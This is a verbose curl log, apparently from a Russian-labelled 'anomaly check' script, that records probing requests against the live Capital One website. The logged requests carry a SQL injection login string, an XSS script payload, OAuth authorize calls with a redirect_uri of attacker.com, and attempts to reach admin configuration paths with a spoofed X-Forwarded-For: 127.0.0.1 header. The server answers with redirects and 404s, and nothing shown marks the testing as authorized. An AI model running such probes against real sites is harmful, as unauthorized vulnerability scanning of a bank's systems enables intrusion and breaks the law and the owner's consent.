=== Начало проверки аномалий ===
=== Проверка 500 Internal Server Error ===
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/account/validateLogin?username=admin'--&password=test
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/account/validateLogin?username=admin'--&password=test]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /api/account/validateLogin?username=admin'--&password=test HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/account/validateLogin/?username=admin'--&password=test
< expires: Fri, 20 Jun 2025 15:44:56 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:56 GMT
< set-cookie: TLTUID=9FF6FDEECE8D845CF3A9FD2988BBEB46; expires=Wed, 19-Jun-2030 15:44:56 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=32F4254FDBD8255A60AC4F5128CA62C3; expires=Fri, 20-Jun-2025 17:44:56 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.58, 92.123.103.82
*   Trying 92.123.103.58:443...
* Connected to www.capitalone.com (92.123.103.58) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/account/validateLogin?username=<script>alert(1)</script>&password=test
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/account/validateLogin?username=<script>alert(1)</script>&password=test]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /api/account/validateLogin?username=<script>alert(1)</script>&password=test HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/account/validateLogin/?username=<script>alert(1)</script>&password=test
< expires: Fri, 20 Jun 2025 15:44:56 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:56 GMT
< set-cookie: TLTUID=48D3A3D470162B31566E4CD5F90B6252; expires=Wed, 19-Jun-2030 15:44:56 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=2338D5B4E9E5E35434D26DBFECF64DCD; expires=Fri, 20-Jun-2025 17:44:56 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/api/account/validateLogin
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /api/account/validateLogin]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: application/json]
} [5 bytes data]
> GET /api/account/validateLogin HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: application/json
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/api/account/validateLogin/
< expires: Fri, 20 Jun 2025 15:44:56 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:56 GMT
< set-cookie: TLTUID=26EBF69AE09DFF36643448E24E59A6F2; expires=Wed, 19-Jun-2030 15:44:56 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=23691BB6BBBBDAD64287C5BAFC9109B8; expires=Fri, 20-Jun-2025 17:44:56 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact



=== Проверка Open Redirect ===
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [80 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://attacker.com
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://attacker.com]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://attacker.com HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/oauth2/authorize/?response_type=code&client_id=test&redirect_uri=https://attacker.com
< expires: Fri, 20 Jun 2025 15:44:56 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:56 GMT
< set-cookie: TLTUID=D76682B96AFA8AD45B5D7545E32EB455; expires=Wed, 19-Jun-2030 15:44:56 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=D626E9FE3F7AC1B7090F5D54D61BCBBD; expires=Fri, 20-Jun-2025 17:44:56 GMT; path=/; domain=.capitalone.com; secure
< 
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [80 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/oauth2/authorize?response_type=token&client_id=test&redirect_uri=https://attacker.com
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /oauth2/authorize?response_type=token&client_id=test&redirect_uri=https://attacker.com]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /oauth2/authorize?response_type=token&client_id=test&redirect_uri=https://attacker.com HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 301 
< content-length: 0
< location: https://www.capitalone.com/oauth2/authorize/?response_type=token&client_id=test&redirect_uri=https://attacker.com
< expires: Fri, 20 Jun 2025 15:44:56 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:56 GMT
< set-cookie: TLTUID=F950BC451AC4AAD8241A57BAE11707D6; expires=Wed, 19-Jun-2030 15:44:56 GMT; path=/; domain=.capitalone.com; secure
< set-cookie: TLTSID=735238EB5B74006E5231E8820E4AA483; expires=Fri, 20-Jun-2025 17:44:56 GMT; path=/; domain=.capitalone.com; secure
< 
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
* Connection #0 to host www.capitalone.com left intact



=== Проверка пустого 200 OK ===
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.58, 92.123.103.82
*   Trying 92.123.103.58:443...
* Connected to www.capitalone.com (92.123.103.58) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [79 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/admin/config.json
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /admin/config.json]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
* [HTTP/2] [1] [x-forwarded-for: 127.0.0.1]
} [5 bytes data]
> GET /admin/config.json HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> X-Forwarded-For: 127.0.0.1
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0< HTTP/2 404 
< accept-ranges: bytes
< content-length: 100
< content-type: text/html
< etag: "d4bf94aec16315618161101efa9d048d:1666125989.803706"
< last-modified: Mon, 26 Sep 2022 16:43:26 GMT
< server: AkamaiNetStorage
< expires: Fri, 20 Jun 2025 15:44:57 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:57 GMT
< 
{ [100 bytes data]
100   100  100   100    0     0     81      0  0:00:01  0:00:01 --:--:--    81
* Connection #0 to host www.capitalone.com left intact
<html><head><meta http-equiv="refresh" content="0; url=/page-not-found/"></head><body></body></html>  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [78 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/admin/config.json
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /admin/config.json]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: application/json]
} [5 bytes data]
> GET /admin/config.json HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: application/json
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0< HTTP/2 404 
< accept-ranges: bytes
< content-length: 100
< content-type: text/html
< etag: "d4bf94aec16315618161101efa9d048d:1666125989.803706"
< last-modified: Mon, 26 Sep 2022 16:43:26 GMT
< server: AkamaiNetStorage
< expires: Fri, 20 Jun 2025 15:44:59 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:44:59 GMT
< 
{ [100 bytes data]
100   100  100   100    0     0     75      0  0:00:01  0:00:01 --:--:--    75
* Connection #0 to host www.capitalone.com left intact
<html><head><meta http-equiv="refresh" content="0; url=/page-not-found/"></head><body></body></html>  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.58, 92.123.103.82
*   Trying 92.123.103.58:443...
* Connected to www.capitalone.com (92.123.103.58) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [80 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/admin/
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /admin/]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /admin/ HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0< HTTP/2 404 
< accept-ranges: bytes
< content-length: 100
< content-type: text/html
< etag: "d4bf94aec16315618161101efa9d048d:1666125989.803706"
< last-modified: Mon, 26 Sep 2022 16:43:26 GMT
< server: AkamaiNetStorage
< expires: Fri, 20 Jun 2025 15:45:00 GMT
